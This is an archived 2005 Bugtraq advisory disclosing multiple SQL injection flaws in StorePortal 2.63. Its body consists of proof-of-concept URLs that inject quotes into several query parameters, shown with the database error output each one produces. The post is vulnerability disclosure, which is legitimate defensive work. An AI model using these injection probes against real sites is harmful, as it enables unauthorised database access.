lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 24 Apr 2005 13:24:14 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: Multiple SQL Injections in StorePortal 2.63




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple SQL Injections in StorePortal 2.63
Date: 24/04/2005

Vendor: StorePortal
Vendor Website: http://www.storeportal.com/
Summary: There are, multiple sql injections in storeportal 2.63.


Proof of Concept Exploits: 

These sql injections are caused by the referrer, of these pages called, and are only exploitable if u visit them after visiting 
default.asp

http://localhost/default.asp?language='sqlinjection
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 

''/default.asp?language='sqlinjection&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?id=1&opr=2&amp%3bpic='sql_injection_
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 

''/default.asp?id=1&opr=2&pic='sql_injection_&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 

''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_
SQL INJECTION

 Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 

''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?mnu=&id=1&opr=5&content='sql_injection_
SQL INJECTION

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 

''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?id=1&opr=4&keyword='sql_injection_
SQL INJECTION

   Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'IdCategoriaInfo = 1 and 
Visible = 

'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or DataExpire is null or DataExpire = '') and (Name like 

'%'sql_injection_%' or Body like '%'sql_injection_%')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 

''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers



Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel 
free to 

contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for 
my soon to come 

out book on Secure coding with php.


Powered by blists - more mailing lists